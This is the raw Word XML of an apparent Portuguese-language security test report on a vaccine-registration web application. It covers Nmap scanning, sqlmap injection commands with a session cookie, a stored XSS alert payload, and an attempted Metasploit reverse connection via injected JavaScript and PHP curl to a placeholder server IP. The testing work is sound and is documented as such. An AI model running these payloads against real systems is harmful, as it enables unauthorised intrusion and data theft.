      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12</w:t>
      </w:r>
      <w:r w:rsidR="00F528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stram</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a execução e as inúmeras </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s de injeção executadas pela ferramenta automatizada</w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRDefault="00F52870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EC5D2B" w:rsidRPr="001B2F09" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B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76240" cy="407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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00F52870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2</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado aplicação</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection via Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRDefault="00F52870" w:rsidP="00F52870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EFAZER AS CONTAGENS DE IMAGENS DAQUI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09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1B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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tir a ação d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</w:t>
      </w:r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Sqlmap na injeção de SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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color w:val="000000"/>
        </w:rPr>
        <w:t>" –b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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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urrent -db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 xml:space="preserve">evel 5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F52870" w:rsidRPr="001B2F09" w:rsidRDefault="00F52870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F52870" w:rsidRDefault="00F52870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1B2F09" w:rsidRDefault="00F52870" w:rsidP="00F52870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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se que a tela de Login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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F0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3</w:t>
      </w:r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503644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3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Atividade</w:t>
      </w:r>
      <w:r w:rsidR="00F52870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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nálise do Servidor </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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N</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ma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 w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo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pós o problema de corrupção do sistema operacional do servidor de dados da aplicação, houve mudanças na arquitetura </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar 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V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a serem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74275B" w:rsidRPr="00892814" w:rsidRDefault="0074275B" w:rsidP="00F52870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1141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5</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Portas TCP escaneadas pelo Nma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8C6DC7" w:rsidRPr="0075159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lastRenderedPageBreak/>
        <w:t>Pptp</w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Protocolo de Tunelamento Ponto a ponto.Utilizado para garantir segurança em redes wireles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t>ms-wbt-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = serviço de gerenciamento de hosts d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U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rá quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0074275B" w:rsidRDefault="008C6DC7" w:rsidP="0074275B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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="008C6DC7" w:rsidP="0074275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Pr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRDefault="0074275B" w:rsidP="0074275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67350" cy="36544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="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B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escobrir se os campos da tela de Cadastro Lotes de Vacinas são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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&lt;script&gt; alert(“oi”);&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>no campo Marca/Fabricante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRDefault="00D46C6B" w:rsidP="00D46C6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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Espera-se que haja um tratamento e esse código não seja executado quando a página carrega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D46C6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aso a aplicação não realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> devem</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="006071F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidR="00D76012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Foi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>inserção de códigos mal-</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742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C1742" w:rsidRDefault="00BC1742" w:rsidP="00BC174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99859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BC1742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7</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F248C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado teste XSS</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7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  <w:r w:rsidR="0049317F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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O esperado é que</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> os dados passados sejam devidamente tratados</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> na aplicação para impedir a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1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler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 2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o Sistema de Vacinas com a máquina virtual do Kali na porta indicada</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan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utilizado no XS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exec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Caso não haja o devido tratamento, o  listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">a aplicação no momento e a máquina onde está o Kali Linux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Pr="007515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A sessão do Meterpreter não foi aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00D46C6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F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tentar descobrir o que impediu a sessão do Meterpreter ser aberta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D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Que a aplicação realize o tratamento para impedir o comando de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRP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D46C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Códig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51768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17685">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0051768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17685">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>$curl = curl_init('http://IP_do_servidor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if(!curl_exec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>javascript:alert(curl_error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 w:rsidRPr="00F34CCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4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0794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o contrário das demais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 xml:space="preserve">s que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707948" w:rsidRDefault="00707948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F935DA" w:rsidRDefault="00D46C6B" w:rsidP="00F935DA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6E255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O esperado é que a aplicação </w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realize</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tratamento para impedir o código de ser executado.</w:t>
      </w:r>
      <w:r w:rsidR="00537F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E2559" w:rsidRDefault="006E2559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37F7B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ódigo abaixo cria um objeto do tipo XMLHttpReques</w:t>
      </w:r>
      <w:r w:rsidR="006E2559">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>t e tenta realizar uma chamada A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>jax do tipo GET para</w:t>
      </w:r>
      <w:r w:rsidR="006E2559">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP_do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00881DA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> na porta 4444, de forma síncrona.</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00487697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 xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="00557D26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00D76012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="0048769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751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Independente da sessão do Meterpreter não ser aberta, o</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> código conseguiu ser inserido e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Injection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 campo Marca/Fabricante é vulnerável a SQL Injection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: 1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uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection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here param1 = &lt;parametro_na_interface&gt; and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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL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P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tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho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Pr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Burp Suite em um arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a parte para ser utilizado pelo Sqlmap posteriormente.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sqlmap -r params -p --current-db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arams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current-db” solicita que o Sqlmap que tente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arâmetr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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O Sqlmap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3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2</w:t>
      </w:r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O comando do Sqlm</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ap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>: sqlmap -r params -p descricao --current-db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“descrição” é o parâmetro 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--current-db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a-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="003A39F6" w:rsidRDefault="00101063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“descricao”</w:t>
      </w:r>
      <w:r w:rsidR="00190AAD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="00101063" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidR="00707948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para teste de injeção SQL não é injetável conforme mostra a figura 17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33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BC174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8</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado aplicação SQL Inje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4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  <w:r w:rsidR="00594AD8" w:rsidRP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lidade” é o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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90AAD" w:rsidRP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  <w:r w:rsidR="00101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r>
      <w:r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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Resultado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90AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” escolhido </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para teste de injeção SQL não é injetável conforme mostra a figura 18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0530" w:rsidRDefault="008D0530" w:rsidP="008D053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71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8D0530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9</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inejction via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00B71A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5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594AD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>: sqlmap –r params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0536AA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cina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B71A0F" w:rsidRDefault="00B71A0F" w:rsidP="00B71A0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71A0F" w:rsidRPr="003A39F6" w:rsidRDefault="00B71A0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 “vacina”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lastRenderedPageBreak/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B71A0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“vacina” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
